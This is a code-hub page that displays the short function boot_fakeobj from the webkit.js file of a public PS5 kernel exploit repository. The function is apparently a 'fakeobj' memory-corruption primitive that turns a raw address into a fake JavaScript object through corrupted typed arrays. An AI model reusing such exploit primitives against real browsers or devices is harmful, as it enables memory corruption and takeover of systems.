Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/Cryptogenic/PS5-IPV6-Kernel-Exploit
/ boot_fakeobj
Function
boot_fakeobj
document/en/ps5/webkit.js:277–282 ·
view source on GitHub ↗
(addr)
Source
from the content-addressed store, hash-verified
275
}
276
277
function
boot_fakeobj(addr) {
278
union_i[0] = addr;
279
union_i[1] = (addr - addr % 0x100000000) / 0x100000000;
280
arrays[258][0] = union_f[0];
281
return
arrays[257][32];
282
}
283
284
//craft misaligned typedarray
285
Callers
1
poc
Function · 0.85
Calls
no outgoing calls
Tested by
no test coverage detected